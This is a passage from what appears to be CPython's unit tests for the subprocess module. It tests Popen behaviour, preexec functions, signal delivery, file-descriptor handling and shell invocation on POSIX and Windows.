# Test that the child process exec failure actually makes # it up to the parent process as the correct exception. self.assertEqual(desired_exception.errno, e.errno) self.assertEqual(desired_exception.strerror, e.strerror) else: self.fail("Expected OSError: %s" % desired_exception) def test_exception_bad_args_0(self): """Test error in the child raised in the parent for a bad args[0].""" desired_exception = self._get_chdir_exception() try: p = subprocess.Popen([self._nonexistent_dir, "-c", ""]) except OSError as e: # Test that the child process exec failure actually makes # it up to the parent process as the correct exception. self.assertEqual(desired_exception.errno, e.errno) self.assertEqual(desired_exception.strerror, e.strerror) else: self.fail("Expected OSError: %s" % desired_exception) def test_restore_signals(self): # Code coverage for both values of restore_signals to make sure it # at least does not blow up. # A test for behavior would be complex. Contributions welcome. subprocess.call([sys.executable, "-c", ""], restore_signals=True) subprocess.call([sys.executable, "-c", ""], restore_signals=False) def test_start_new_session(self): # For code coverage of calling setsid(). We don't care if we get an # EPERM error from it depending on the test execution environment, that # still indicates that it was called. 
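        # With start_new_session=True the child calls setsid(), so the process
        # group id it reports must differ from the parent's, as checked below.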
try: output = subprocess.check_output( [sys.executable, "-c", "import os; print(os.getpgid(os.getpid()))"], start_new_session=True) except OSError as e: if e.errno != errno.EPERM: raise else: parent_pgid = os.getpgid(os.getpid()) child_pgid = int(output) self.assertNotEqual(parent_pgid, child_pgid) def test_run_abort(self): # returncode handles signal termination with support.SuppressCrashReport(): p = subprocess.Popen([sys.executable, "-c", 'import os; os.abort()']) p.wait() self.assertEqual(-p.returncode, signal.SIGABRT) def test_preexec(self): # DISCLAIMER: Setting environment variables is *not* a good use # of a preexec_fn. This is merely a test. p = subprocess.Popen([sys.executable, "-c", 'import sys,os;' 'sys.stdout.write(os.getenv("FRUIT"))'], stdout=subprocess.PIPE, preexec_fn=lambda: os.putenv("FRUIT", "apple")) self.addCleanup(p.stdout.close) self.assertEqual(p.stdout.read(), b"apple") def test_preexec_exception(self): def raise_it(): raise ValueError("What if two swallows carried a coconut?") try: p = subprocess.Popen([sys.executable, "-c", ""], preexec_fn=raise_it) except subprocess.SubprocessError as e: self.assertTrue( subprocess._posixsubprocess, "Expected a ValueError from the preexec_fn") except ValueError as e: self.assertIn("coconut", e.args[0]) else: self.fail("Exception raised by preexec_fn did not make it " "to the parent process.") class _TestExecuteChildPopen(subprocess.Popen): """Used to test behavior at the end of _execute_child.""" def __init__(self, testcase, *args, **kwargs): self._testcase = testcase subprocess.Popen.__init__(self, *args, **kwargs) def _execute_child(self, *args, **kwargs): try: subprocess.Popen._execute_child(self, *args, **kwargs) finally: # Open a bunch of file descriptors and verify that # none of them are the same as the ones the Popen # instance is using for stdin/stdout/stderr. devzero_fds = [os.open("/dev/zero", os.O_RDONLY) for _ in range(8)] try: for fd in devzero_fds: self._testcase.assertNotIn( fd, (self.stdin.fileno(), self.stdout.fileno(), self.stderr.fileno()), msg="At least one fd was closed early.") finally: for fd in devzero_fds: os.close(fd) @unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.") def test_preexec_errpipe_does_not_double_close_pipes(self): """Issue16140: Don't double close pipes on preexec error.""" def raise_it(): raise subprocess.SubprocessError( "force the _execute_child() errpipe_data path.") with self.assertRaises(subprocess.SubprocessError): self._TestExecuteChildPopen( self, [sys.executable, "-c", "pass"], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, preexec_fn=raise_it) def test_preexec_gc_module_failure(self): # This tests the code that disables garbage collection if the child # process will execute any Python. 
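        # gc.disable and gc.isenabled are monkeypatched below to verify that
        # Popen restores the collector state and copes with failures in them.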
def raise_runtime_error(): raise RuntimeError("this shouldn't escape") enabled = gc.isenabled() orig_gc_disable = gc.disable orig_gc_isenabled = gc.isenabled try: gc.disable() self.assertFalse(gc.isenabled()) subprocess.call([sys.executable, '-c', ''], preexec_fn=lambda: None) self.assertFalse(gc.isenabled(), "Popen enabled gc when it shouldn't.") gc.enable() self.assertTrue(gc.isenabled()) subprocess.call([sys.executable, '-c', ''], preexec_fn=lambda: None) self.assertTrue(gc.isenabled(), "Popen left gc disabled.") gc.disable = raise_runtime_error self.assertRaises(RuntimeError, subprocess.Popen, [sys.executable, '-c', ''], preexec_fn=lambda: None) del gc.isenabled # force an AttributeError self.assertRaises(AttributeError, subprocess.Popen, [sys.executable, '-c', ''], preexec_fn=lambda: None) finally: gc.disable = orig_gc_disable gc.isenabled = orig_gc_isenabled if not enabled: gc.disable() def test_args_string(self): # args is a string fd, fname = mkstemp() # reopen in text mode with open(fd, "w", errors="surrogateescape") as fobj: fobj.write("#!/bin/sh\n") fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" % sys.executable) os.chmod(fname, 0o700) p = subprocess.Popen(fname) p.wait() os.remove(fname) self.assertEqual(p.returncode, 47) def test_invalid_args(self): # invalid arguments should raise ValueError self.assertRaises(ValueError, subprocess.call, [sys.executable, "-c", "import sys; sys.exit(47)"], startupinfo=47) self.assertRaises(ValueError, subprocess.call, [sys.executable, "-c", "import sys; sys.exit(47)"], creationflags=47) def test_shell_sequence(self): # Run command through the shell (sequence) newenv = os.environ.copy() newenv["FRUIT"] = "apple" p = subprocess.Popen(["echo $FRUIT"], shell=1, stdout=subprocess.PIPE, env=newenv) self.addCleanup(p.stdout.close) self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple") def test_shell_string(self): # Run command through the shell (string) newenv = os.environ.copy() newenv["FRUIT"] = "apple" p = subprocess.Popen("echo $FRUIT", shell=1, stdout=subprocess.PIPE, env=newenv) self.addCleanup(p.stdout.close) self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple") def test_call_string(self): # call() function with string argument on UNIX fd, fname = mkstemp() # reopen in text mode with open(fd, "w", errors="surrogateescape") as fobj: fobj.write("#!/bin/sh\n") fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" % sys.executable) os.chmod(fname, 0o700) rc = subprocess.call(fname) os.remove(fname) self.assertEqual(rc, 47) def test_specific_shell(self): # Issue #9265: Incorrect name passed as arg[0]. shells = [] for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']: for name in ['bash', 'ksh']: sh = os.path.join(prefix, name) if os.path.isfile(sh): shells.append(sh) if not shells: # Will probably work for any shell but csh. self.skipTest("bash or ksh required for this test") sh = '/bin/sh' if os.path.isfile(sh) and not os.path.islink(sh): # Test will fail if /bin/sh is a symlink to csh. shells.append(sh) for sh in shells: p = subprocess.Popen("echo $0", executable=sh, shell=True, stdout=subprocess.PIPE) self.addCleanup(p.stdout.close) self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii')) def _kill_process(self, method, *args): # Do not inherit file handles from the parent. # It should fix failures on some platforms. # Also set the SIGINT handler to the default to make sure it's not # being ignored (some tests rely on that.) 
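        # Install the default SIGINT handler only while spawning the child;
        # the previous handler is restored in the finally block below.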
old_handler = signal.signal(signal.SIGINT, signal.default_int_handler) try: p = subprocess.Popen([sys.executable, "-c", """if 1: import sys, time sys.stdout.write('x\\n') sys.stdout.flush() time.sleep(30) """], close_fds=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) finally: signal.signal(signal.SIGINT, old_handler) # Wait for the interpreter to be completely initialized before # sending any signal. p.stdout.read(1) getattr(p, method)(*args) return p @unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')), "Due to known OS bug (issue #16762)") def _kill_dead_process(self, method, *args): # Do not inherit file handles from the parent. # It should fix failures on some platforms. p = subprocess.Popen([sys.executable, "-c", """if 1: import sys, time sys.stdout.write('x\\n') sys.stdout.flush() """], close_fds=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) # Wait for the interpreter to be completely initialized before # sending any signal. p.stdout.read(1) # The process should end after this time.sleep(1) # This shouldn't raise even though the child is now dead getattr(p, method)(*args) p.communicate() def test_send_signal(self): p = self._kill_process('send_signal', signal.SIGINT) _, stderr = p.communicate() self.assertIn(b'KeyboardInterrupt', stderr) self.assertNotEqual(p.wait(), 0) def test_kill(self): p = self._kill_process('kill') _, stderr = p.communicate() self.assertStderrEqual(stderr, b'') self.assertEqual(p.wait(), -signal.SIGKILL) def test_terminate(self): p = self._kill_process('terminate') _, stderr = p.communicate() self.assertStderrEqual(stderr, b'') self.assertEqual(p.wait(), -signal.SIGTERM) def test_send_signal_dead(self): # Sending a signal to a dead process self._kill_dead_process('send_signal', signal.SIGINT) def test_kill_dead(self): # Killing a dead process self._kill_dead_process('kill') def test_terminate_dead(self): # Terminating a dead process self._kill_dead_process('terminate') def _save_fds(self, save_fds): fds = [] for fd in save_fds: inheritable = os.get_inheritable(fd) saved = os.dup(fd) fds.append((fd, saved, inheritable)) return fds def _restore_fds(self, fds): for fd, saved, inheritable in fds: os.dup2(saved, fd, inheritable=inheritable) os.close(saved) def check_close_std_fds(self, fds): # Issue #9905: test that subprocess pipes still work properly with # some standard fds closed stdin = 0 saved_fds = self._save_fds(fds) for fd, saved, inheritable in saved_fds: if fd == 0: stdin = saved break try: for fd in fds: os.close(fd) out, err = subprocess.Popen([sys.executable, "-c", 'import sys;' 'sys.stdout.write("apple");' 'sys.stdout.flush();' 'sys.stderr.write("orange")'], stdin=stdin, stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate() err = support.strip_python_stderr(err) self.assertEqual((out, err), (b'apple', b'orange')) finally: self._restore_fds(saved_fds) def test_close_fd_0(self): self.check_close_std_fds([0]) def test_close_fd_1(self): self.check_close_std_fds([1]) def test_close_fd_2(self): self.check_close_std_fds([2]) def test_close_fds_0_1(self): self.check_close_std_fds([0, 1]) def test_close_fds_0_2(self): self.check_close_std_fds([0, 2]) def test_close_fds_1_2(self): self.check_close_std_fds([1, 2]) def test_close_fds_0_1_2(self): # Issue #10806: test that subprocess pipes still work properly with # all standard fds closed. 
self.check_close_std_fds([0, 1, 2]) def test_small_errpipe_write_fd(self): """Issue #15798: Popen should work when stdio fds are available.""" new_stdin = os.dup(0) new_stdout = os.dup(1) try: os.close(0) os.close(1) # Side test: if errpipe_write fails to have its CLOEXEC # flag set this should cause the parent to think the exec # failed. Extremely unlikely: everyone supports CLOEXEC. subprocess.Popen([ sys.executable, "-c", "print('AssertionError:0:CLOEXEC failure.')"]).wait() finally: # Restore original stdin and stdout os.dup2(new_stdin, 0) os.dup2(new_stdout, 1) os.close(new_stdin) os.close(new_stdout) def test_remapping_std_fds(self): # open up some temporary files temps = [mkstemp() for i in range(3)] try: temp_fds = [fd for fd, fname in temps] # unlink the files -- we won't need to reopen them for fd, fname in temps: os.unlink(fname) # write some data to what will become stdin, and rewind os.write(temp_fds[1], b"STDIN") os.lseek(temp_fds[1], 0, 0) # move the standard file descriptors out of the way saved_fds = self._save_fds(range(3)) try: # duplicate the file objects over the standard fd's for fd, temp_fd in enumerate(temp_fds): os.dup2(temp_fd, fd) # now use those files in the "wrong" order, so that subprocess # has to rearrange them in the child p = subprocess.Popen([sys.executable, "-c", 'import sys; got = sys.stdin.read();' 'sys.stdout.write("got %s"%got); sys.stderr.write("err")'], stdin=temp_fds[1], stdout=temp_fds[2], stderr=temp_fds[0]) p.wait() finally: self._restore_fds(saved_fds) for fd in temp_fds: os.lseek(fd, 0, 0) out = os.read(temp_fds[2], 1024) err = support.strip_python_stderr(os.read(temp_fds[0], 1024)) self.assertEqual(out, b"got STDIN") self.assertEqual(err, b"err") finally: for fd in temp_fds: os.close(fd) def check_swap_fds(self, stdin_no, stdout_no, stderr_no): # open up some temporary files temps = [mkstemp() for i in range(3)] temp_fds = [fd for fd, fname in temps] try: # unlink the files -- we won't need to reopen them for fd, fname in temps: os.unlink(fname) # save a copy of the standard file descriptors saved_fds = self._save_fds(range(3)) try: # duplicate the temp files over the standard fd's 0, 1, 2 for fd, temp_fd in enumerate(temp_fds): os.dup2(temp_fd, fd) # write some data to what will become stdin, and rewind os.write(stdin_no, b"STDIN") os.lseek(stdin_no, 0, 0) # now use those files in the given order, so that subprocess # has to rearrange them in the child p = subprocess.Popen([sys.executable, "-c", 'import sys; got = sys.stdin.read();' 'sys.stdout.write("got %s"%got); sys.stderr.write("err")'], stdin=stdin_no, stdout=stdout_no, stderr=stderr_no) p.wait() for fd in temp_fds: os.lseek(fd, 0, 0) out = os.read(stdout_no, 1024) err = support.strip_python_stderr(os.read(stderr_no, 1024)) finally: self._restore_fds(saved_fds) self.assertEqual(out, b"got STDIN") self.assertEqual(err, b"err") finally: for fd in temp_fds: os.close(fd) # When duping fds, if there arises a situation where one of the fds is # either 0, 1 or 2, it is possible that it is overwritten (#12607). # This tests all combinations of this. 
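    # check_swap_fds() is driven below with all six permutations of fds 0, 1 and 2.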
def test_swap_fds(self): self.check_swap_fds(0, 1, 2) self.check_swap_fds(0, 2, 1) self.check_swap_fds(1, 0, 2) self.check_swap_fds(1, 2, 0) self.check_swap_fds(2, 0, 1) self.check_swap_fds(2, 1, 0) def test_surrogates_error_message(self): def prepare(): raise ValueError("surrogate:\uDCff") try: subprocess.call( [sys.executable, "-c", "pass"], preexec_fn=prepare) except ValueError as err: # Pure Python implementations keeps the message self.assertIsNone(subprocess._posixsubprocess) self.assertEqual(str(err), "surrogate:\uDCff") except subprocess.SubprocessError as err: # _posixsubprocess uses a default message self.assertIsNotNone(subprocess._posixsubprocess) self.assertEqual(str(err), "Exception occurred in preexec_fn.") else: self.fail("Expected ValueError or subprocess.SubprocessError") def test_undecodable_env(self): for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')): encoded_value = value.encode("ascii", "surrogateescape") # test str with surrogates script = "import os; print(ascii(os.getenv(%s)))" % repr(key) env = os.environ.copy() env[key] = value # Use C locale to get ASCII for the locale encoding to force # surrogate-escaping of \xFF in the child process; otherwise it can # be decoded as-is if the default locale is latin-1. env['LC_ALL'] = 'C' if sys.platform.startswith("aix"): # On AIX, the C locale uses the Latin1 encoding decoded_value = encoded_value.decode("latin1", "surrogateescape") else: # On other UNIXes, the C locale uses the ASCII encoding decoded_value = value stdout = subprocess.check_output( [sys.executable, "-c", script], env=env) stdout = stdout.rstrip(b'\n\r') self.assertEqual(stdout.decode('ascii'), ascii(decoded_value)) # test bytes key = key.encode("ascii", "surrogateescape") script = "import os; print(ascii(os.getenvb(%s)))" % repr(key) env = os.environ.copy() env[key] = encoded_value stdout = subprocess.check_output( [sys.executable, "-c", script], env=env) stdout = stdout.rstrip(b'\n\r') self.assertEqual(stdout.decode('ascii'), ascii(encoded_value)) def test_bytes_program(self): abs_program = os.fsencode(sys.executable) path, program = os.path.split(sys.executable) program = os.fsencode(program) # absolute bytes path exitcode = subprocess.call([abs_program, "-c", "pass"]) self.assertEqual(exitcode, 0) # absolute bytes path as a string cmd = b"'" + abs_program + b"' -c pass" exitcode = subprocess.call(cmd, shell=True) self.assertEqual(exitcode, 0) # bytes program, unicode PATH env = os.environ.copy() env["PATH"] = path exitcode = subprocess.call([program, "-c", "pass"], env=env) self.assertEqual(exitcode, 0) # bytes program, bytes PATH envb = os.environb.copy() envb[b"PATH"] = os.fsencode(path) exitcode = subprocess.call([program, "-c", "pass"], env=envb) self.assertEqual(exitcode, 0) def test_pipe_cloexec(self): sleeper = support.findfile("input_reader.py", subdir="subprocessdata") fd_status = support.findfile("fd_status.py", subdir="subprocessdata") p1 = subprocess.Popen([sys.executable, sleeper], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=False) self.addCleanup(p1.communicate, b'') p2 = subprocess.Popen([sys.executable, fd_status], stdout=subprocess.PIPE, close_fds=False) output, error = p2.communicate() result_fds = set(map(int, output.split(b','))) unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(), p1.stderr.fileno()]) self.assertFalse(result_fds & unwanted_fds, "Expected no fds from %r to be open in child, " "found %r" % (unwanted_fds, result_fds & unwanted_fds)) def 
test_pipe_cloexec_real_tools(self): qcat = support.findfile("qcat.py", subdir="subprocessdata") qgrep = support.findfile("qgrep.py", subdir="subprocessdata") subdata = b'zxcvbn' data = subdata * 4 + b'\n' p1 = subprocess.Popen([sys.executable, qcat], stdin=subprocess.PIPE, stdout=subprocess.PIPE, close_fds=False) p2 = subprocess.Popen([sys.executable, qgrep, subdata], stdin=p1.stdout, stdout=subprocess.PIPE, close_fds=False) self.addCleanup(p1.wait) self.addCleanup(p2.wait) def kill_p1(): try: p1.terminate() except ProcessLookupError: pass def kill_p2(): try: p2.terminate() except ProcessLookupError: pass self.addCleanup(kill_p1) self.addCleanup(kill_p2) p1.stdin.write(data) p1.stdin.close() readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10) self.assertTrue(readfiles, "The child hung") self.assertEqual(p2.stdout.read(), data) p1.stdout.close() p2.stdout.close() def test_close_fds(self): fd_status = support.findfile("fd_status.py", subdir="subprocessdata") fds = os.pipe() self.addCleanup(os.close, fds[0]) self.addCleanup(os.close, fds[1]) open_fds = set(fds) # add a bunch more fds for _ in range(9): fd = os.open(os.devnull, os.O_RDONLY) self.addCleanup(os.close, fd) open_fds.add(fd) for fd in open_fds: os.set_inheritable(fd, True) p = subprocess.Popen([sys.executable, fd_status], stdout=subprocess.PIPE, close_fds=False) output, ignored = p.communicate() remaining_fds = set(map(int, output.split(b','))) self.assertEqual(remaining_fds & open_fds, open_fds, "Some fds were closed") p = subprocess.Popen([sys.executable, fd_status], stdout=subprocess.PIPE, close_fds=True) output, ignored = p.communicate() remaining_fds = set(map(int, output.split(b','))) self.assertFalse(remaining_fds & open_fds, "Some fds were left open") self.assertIn(1, remaining_fds, "Subprocess failed") # Keep some of the fd's we opened open in the subprocess. # This tests _posixsubprocess.c's proper handling of fds_to_keep. fds_to_keep = set(open_fds.pop() for _ in range(8)) p = subprocess.Popen([sys.executable, fd_status], stdout=subprocess.PIPE, close_fds=True, pass_fds=()) output, ignored = p.communicate() remaining_fds = set(map(int, output.split(b','))) self.assertFalse(remaining_fds & fds_to_keep & open_fds, "Some fds not in pass_fds were left open") self.assertIn(1, remaining_fds, "Subprocess failed") @unittest.skipIf(sys.platform.startswith("freebsd") and os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev, "Requires fdescfs mounted on /dev/fd on FreeBSD.") def test_close_fds_when_max_fd_is_lowered(self): """Confirm that issue21618 is fixed (may fail under valgrind).""" fd_status = support.findfile("fd_status.py", subdir="subprocessdata") # This launches the meat of the test in a child process to # avoid messing with the larger unittest processes maximum # number of file descriptors. # This process launches: # +--> Process that lowers its RLIMIT_NOFILE aftr setting up # a bunch of high open fds above the new lower rlimit. # Those are reported via stdout before launching a new # process with close_fds=False to run the actual test: # +--> The TEST: This one launches a fd_status.py # subprocess with close_fds=True so we can find out if # any of the fds above the lowered rlimit are still open. p = subprocess.Popen([sys.executable, '-c', textwrap.dedent( ''' import os, resource, subprocess, sys, textwrap open_fds = set() # Add a bunch more fds to pass down. 
for _ in range(40): fd = os.open(os.devnull, os.O_RDONLY) open_fds.add(fd) # Leave a two pairs of low ones available for use by the # internal child error pipe and the stdout pipe. # We also leave 10 more open as some Python buildbots run into # "too many open files" errors during the test if we do not. for fd in sorted(open_fds)[:14]: os.close(fd) open_fds.remove(fd) for fd in open_fds: #self.addCleanup(os.close, fd) os.set_inheritable(fd, True) max_fd_open = max(open_fds) # Communicate the open_fds to the parent unittest.TestCase process. print(','.join(map(str, sorted(open_fds)))) sys.stdout.flush() rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE) try: # 29 is lower than the highest fds we are leaving open. resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max)) # Launch a new Python interpreter with our low fd rlim_cur that # inherits open fds above that limit. It then uses subprocess # with close_fds=True to get a report of open fds in the child. # An explicit list of fds to check is passed to fd_status.py as # letting fd_status rely on its default logic would miss the # fds above rlim_cur as it normally only checks up to that limit. subprocess.Popen( [sys.executable, '-c', textwrap.dedent(""" import subprocess, sys subprocess.Popen([sys.executable, %r] + [str(x) for x in range({max_fd})], close_fds=True).wait() """.format(max_fd=max_fd_open+1))], close_fds=False).wait() finally: resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max)) ''' % fd_status)], stdout=subprocess.PIPE) output, unused_stderr = p.communicate() output_lines = output.splitlines() self.assertEqual(len(output_lines), 2, msg="expected exactly two lines of output:\n%r" % output) opened_fds = set(map(int, output_lines[0].strip().split(b','))) remaining_fds = set(map(int, output_lines[1].strip().split(b','))) self.assertFalse(remaining_fds & opened_fds, msg="Some fds were left open.") # Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file # descriptor of a pipe closed in the parent process is valid in the # child process according to fstat(), but the mode of the file # descriptor is invalid, and read or write raise an error. @support.requires_mac_ver(10, 5) def test_pass_fds(self): fd_status = support.findfile("fd_status.py", subdir="subprocessdata") open_fds = set() for x in range(5): fds = os.pipe() self.addCleanup(os.close, fds[0]) self.addCleanup(os.close, fds[1]) os.set_inheritable(fds[0], True) os.set_inheritable(fds[1], True) open_fds.update(fds) for fd in open_fds: p = subprocess.Popen([sys.executable, fd_status], stdout=subprocess.PIPE, close_fds=True, pass_fds=(fd, )) output, ignored = p.communicate() remaining_fds = set(map(int, output.split(b','))) to_be_closed = open_fds - {fd} self.assertIn(fd, remaining_fds, "fd to be passed not passed") self.assertFalse(remaining_fds & to_be_closed, "fd to be closed passed") # pass_fds overrides close_fds with a warning. 
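            # Combining close_fds=False with a non-empty pass_fds must raise a
            # RuntimeWarning saying that close_fds is being overridden.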
with self.assertWarns(RuntimeWarning) as context: self.assertFalse(subprocess.call( [sys.executable, "-c", "import sys; sys.exit(0)"], close_fds=False, pass_fds=(fd, ))) self.assertIn('overriding close_fds', str(context.warning)) def test_pass_fds_inheritable(self): script = support.findfile("fd_status.py", subdir="subprocessdata") inheritable, non_inheritable = os.pipe() self.addCleanup(os.close, inheritable) self.addCleanup(os.close, non_inheritable) os.set_inheritable(inheritable, True) os.set_inheritable(non_inheritable, False) pass_fds = (inheritable, non_inheritable) args = [sys.executable, script] args += list(map(str, pass_fds)) p = subprocess.Popen(args, stdout=subprocess.PIPE, close_fds=True, pass_fds=pass_fds) output, ignored = p.communicate() fds = set(map(int, output.split(b','))) # the inheritable file descriptor must be inherited, so its inheritable # flag must be set in the child process after fork() and before exec() self.assertEqual(fds, set(pass_fds), "output=%a" % output) # inheritable flag must not be changed in the parent process self.assertEqual(os.get_inheritable(inheritable), True) self.assertEqual(os.get_inheritable(non_inheritable), False) def test_stdout_stdin_are_single_inout_fd(self): with io.open(os.devnull, "r+") as inout: p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"], stdout=inout, stdin=inout) p.wait() def test_stdout_stderr_are_single_inout_fd(self): with io.open(os.devnull, "r+") as inout: p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"], stdout=inout, stderr=inout) p.wait() def test_stderr_stdin_are_single_inout_fd(self): with io.open(os.devnull, "r+") as inout: p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"], stderr=inout, stdin=inout) p.wait() def test_wait_when_sigchild_ignored(self): # NOTE: sigchild_ignore.py may not be an effective test on all OSes. sigchild_ignore = support.findfile("sigchild_ignore.py", subdir="subprocessdata") p = subprocess.Popen([sys.executable, sigchild_ignore], stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, stderr = p.communicate() self.assertEqual(0, p.returncode, "sigchild_ignore.py exited" " non-zero with this error:\n%s" % stderr.decode('utf-8')) def test_select_unbuffered(self): # Issue #11459: bufsize=0 should really set the pipes as # unbuffered (and therefore let select() work properly). select = support.import_module("select") p = subprocess.Popen([sys.executable, "-c", 'import sys;' 'sys.stdout.write("apple")'], stdout=subprocess.PIPE, bufsize=0) f = p.stdout self.addCleanup(f.close) try: self.assertEqual(f.read(4), b"appl") self.assertIn(f, select.select([f], [], [], 0.0)[0]) finally: p.wait() def test_zombie_fast_process_del(self): # Issue #12650: on Unix, if Popen.__del__() was called before the # process exited, it wouldn't be added to subprocess._active, and would # remain a zombie. # spawn a Popen, and delete its reference before it exits p = subprocess.Popen([sys.executable, "-c", 'import sys, time;' 'time.sleep(0.2)'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) ident = id(p) pid = p.pid del p # check that p is in the active processes list self.assertIn(ident, [id(o) for o in subprocess._active]) def test_leak_fast_process_del_killed(self): # Issue #12650: on Unix, if Popen.__del__() was called before the # process exited, and the process got killed by a signal, it would never # be removed from subprocess._active, which triggered a FD and memory # leak. 
# spawn a Popen, delete its reference and kill it p = subprocess.Popen([sys.executable, "-c", 'import time;' 'time.sleep(3)'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) ident = id(p) pid = p.pid del p os.kill(pid, signal.SIGKILL) # check that p is in the active processes list self.assertIn(ident, [id(o) for o in subprocess._active]) # let some time for the process to exit, and create a new Popen: this # should trigger the wait() of p time.sleep(0.2) with self.assertRaises(OSError) as c: with subprocess.Popen(['nonexisting_i_hope'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) as proc: pass # p should have been wait()ed on, and removed from the _active list self.assertRaises(OSError, os.waitpid, pid, 0) self.assertNotIn(ident, [id(o) for o in subprocess._active]) def test_close_fds_after_preexec(self): fd_status = support.findfile("fd_status.py", subdir="subprocessdata") # this FD is used as dup2() target by preexec_fn, and should be closed # in the child process fd = os.dup(1) self.addCleanup(os.close, fd) p = subprocess.Popen([sys.executable, fd_status], stdout=subprocess.PIPE, close_fds=True, preexec_fn=lambda: os.dup2(1, fd)) output, ignored = p.communicate() remaining_fds = set(map(int, output.split(b','))) self.assertNotIn(fd, remaining_fds) @support.cpython_only def test_fork_exec(self): # Issue #22290: fork_exec() must not crash on memory allocation failure # or other errors import _posixsubprocess gc_enabled = gc.isenabled() try: # Use a preexec function and enable the garbage collector # to force fork_exec() to re-enable the garbage collector # on error. func = lambda: None gc.enable() executable_list = "exec" # error: must be a sequence for args, exe_list, cwd, env_list in ( (123, [b"exe"], None, [b"env"]), ([b"arg"], 123, None, [b"env"]), ([b"arg"], [b"exe"], 123, [b"env"]), ([b"arg"], [b"exe"], None, 123), ): with self.assertRaises(TypeError): _posixsubprocess.fork_exec( args, exe_list, True, [], cwd, env_list, -1, -1, -1, -1, 1, 2, 3, 4, True, True, func) finally: if not gc_enabled: gc.disable() @unittest.skipUnless(mswindows, "Windows specific tests") class Win32ProcessTestCase(BaseTestCase): def test_startupinfo(self): # startupinfo argument # We uses hardcoded constants, because we do not want to # depend on win32all. 
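        # These values match the Win32 API constants of the same names.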
STARTF_USESHOWWINDOW = 1 SW_MAXIMIZE = 3 startupinfo = subprocess.STARTUPINFO() startupinfo.dwFlags = STARTF_USESHOWWINDOW startupinfo.wShowWindow = SW_MAXIMIZE # Since Python is a console process, it won't be affected # by wShowWindow, but the argument should be silently # ignored subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"], startupinfo=startupinfo) def test_creationflags(self): # creationflags argument CREATE_NEW_CONSOLE = 16 sys.stderr.write(" a DOS box should flash briefly ...\n") subprocess.call(sys.executable + ' -c "import time; time.sleep(0.25)"', creationflags=CREATE_NEW_CONSOLE) def test_invalid_args(self): # invalid arguments should raise ValueError self.assertRaises(ValueError, subprocess.call, [sys.executable, "-c", "import sys; sys.exit(47)"], preexec_fn=lambda: 1) self.assertRaises(ValueError, subprocess.call, [sys.executable, "-c", "import sys; sys.exit(47)"], stdout=subprocess.PIPE, close_fds=True) def test_close_fds(self): # close file descriptors rc = subprocess.call([sys.executable, "-c", "import sys; sys.exit(47)"], close_fds=True) self.assertEqual(rc, 47) def test_shell_sequence(self): # Run command through the shell (sequence) newenv = os.environ.copy() newenv["FRUIT"] = "physalis" p = subprocess.Popen(["set"], shell=1, stdout=subprocess.PIPE, env=newenv) self.addCleanup(p.stdout.close) self.assertIn(b"physalis", p.stdout.read()) def test_shell_string(self): # Run command through the shell (string) newenv = os.environ.copy() newenv["FRUIT"] = "physalis" p = subprocess.Popen("set", shell=1, stdout=subprocess.PIPE, env=newenv) self.addCleanup(p.stdout.close) self.assertIn(b"physalis", p.stdout.read()) def test_call_string(self): # call() function with string argument on Windows rc = subprocess.call(sys.executable + ' -c "import sys; sys.exit(47)"') self.assertEqual(rc, 47) def _kill_process(self, method, *args): # Some win32 buildbot raises EOFError if stdin is inherited p = subprocess.Popen([sys.executable, "-c", """if 1: import sys, time sys.stdout.write('x\\n') sys.stdout.flush() time.sleep(30) """], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) self.addCleanup(p.stdin.close) # Wait for the interpreter to be completely initialized before # sending any signal. p.stdout.read(1) getattr(p, method)(*args) _, stderr = p.communicate() self.assertStderrEqual(stderr, b'') returncode = p.wait() self.assertNotEqual(returncode, 0) def _kill_dead_process(self, method, *args): p = subprocess.Popen([sys.executable, "-c", """if 1: import sys, time sys.stdout.write('x\\n') sys.stdout.flush() sys.exit(42) """], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) self.addCleanup(p.stdout.close) self.addCleanup(p.stderr.close) self.addCleanup(p.stdin.close) # Wait for the interpreter to be completely initialized before # sending any signal. 
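        # The child exits on its own with code 42; signalling it afterwards
        # must not raise, and wait() below must still report that exit code.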
